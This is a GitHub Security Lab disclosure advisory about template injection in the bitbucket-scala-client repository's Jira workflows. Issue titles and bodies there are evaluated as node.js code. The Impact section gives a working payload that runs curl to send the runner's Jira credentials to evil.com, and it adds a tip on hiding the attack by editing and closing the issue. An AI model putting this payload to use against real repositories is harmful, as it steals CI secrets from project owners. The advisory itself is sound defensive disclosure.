GHSL-2020-178: Template injection in the GitHub workflows of bitbucket-scala-client repository

Summary

Automatic GitHub workflows in bitbucket-scala-client repository are vulnerable to template injection from user comments.

Product

bitbucket-scala-client GitHub repository

Tested Version

Master branch.

Details

Issue: Hidden expression expansion of input parameters passed to atlassian/gajira-create or atlassian/gajira-comment

Jira Add comment on issue step in comment_issue.yml, Jira Create issue step in create_issue.yml and Jira Create issue step in create_issue_on_label.yml workflows are vulnerable to template injection.

${{ github.event.issue.title }},${{ github.event.issue.body }} and ${{ github.event.comment.body }} are used to format input values to atlassian/gajira-create(comment) actions. For example:

on:
  issues:
    types: [ opened ]
...
uses: atlassian/gajira-create@v2.0.0
with:
    summary: "[GH#${{ github.event.issue.number }}]  ${{ github.event.issue.title }}"
    description: |
    ${{ github.event.issue.body }}
    ----
    {panel}
    _[Github permalink |${{ github.event.issue.html_url }}]_
    {panel}

However the Atlassian actions have a hidden feature - they expand {{}} internally. This way when the issue title or body contains an expression in double curly braces it is evaluated by node.js in these actions.

Impact

This vulnerability allows for arbitrary code execution in the context of GitHub runner. For example a user may create an issue with the title It doesn't work on my machine and the body

{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials http://evil.com`) }}

which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the body of the issue to Never mind my bad. and close it.

Coordinated Disclosure Timeline

• 10/14/2020: Report sent to vendor
• 10/26/2020: Acknowledged by vendor
• 10/29/2020: Issue resolved

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-178 in any communication regarding this issue.